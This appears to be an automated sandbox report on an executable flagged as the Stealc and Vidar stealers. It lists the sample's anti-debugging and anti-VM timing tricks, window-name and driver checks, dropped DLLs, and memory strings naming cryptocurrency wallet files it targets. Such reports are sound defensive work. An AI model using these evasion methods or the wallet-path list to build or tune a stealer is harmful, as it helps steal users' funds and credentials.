Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938366 second address: 93836A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93836A second address: 93838C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F81D5048969h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94C04F second address: 94C05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F81D4B5DC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94C05E second address: 94C070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F81D5048956h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95BCE8 second address: 95BCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F81D4B5DC56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007F81D4B5DC56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95BCFD second address: 95BD03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AD63 second address: 95AD6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AD6D second address: 95AD98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Eh 0x00000007 jmp 00007F81D504895Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AD98 second address: 95ADA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95ADA0 second address: 95ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95ADA8 second address: 95ADAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B75A second address: 95B75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B75E second address: 95B764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B9E4 second address: 95B9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E637 second address: 95E641 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D4B5DC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E641 second address: 95E659 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F81D504895Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95FEC2 second address: 95FF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F81D4B5DC56h 0x0000000a popad 0x0000000b jmp 00007F81D4B5DC69h 0x00000010 pushad 0x00000011 jmp 00007F81D4B5DC5Ch 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d jnp 00007F81D4B5DC67h 0x00000023 jne 00007F81D4B5DC73h 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95FF39 second address: 95FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95FF42 second address: 95FF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC029F second address: 4FC02A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC02A3 second address: 4FC02B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC02B2 second address: 4FC02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC02B8 second address: 4FC02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC02BC second address: 4FC02E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F81D5048965h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC02E7 second address: 4FC02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC040E second address: 4FC0412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0412 second address: 4FC042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 882922 second address: 882926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0A07 second address: 4FC0A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F81D4B5DC61h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F81D4B5DC68h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0A4B second address: 4FC0A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: 8FFE87 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 10.0 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00484910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00484910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0047DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0047E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0047BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004716D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00483EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00483EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0047F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004838B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00484570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00484570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0047ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0047DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00471160 GetSystemInfo,ExitProcess,

0_2_00471160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwaren

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58148
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58151
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59337
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58162
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58170
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58201

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C645FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C645FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004745C0 VirtualProtect ?,00000004,00000100,00000000

0_2_004745C0

Source: C:\Users\user\Desktop\file.exe

0_2_00489860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00489750 mov eax, dword ptr fs:[00000030h]

0_2_00489750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00487850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C61B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C61B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00489600

Source: file.exe, file.exe, 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Z\Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C61B341 cpuid

0_2_6C61B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00487B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00486920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00486920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00487850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00487A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00487A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1700366205.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
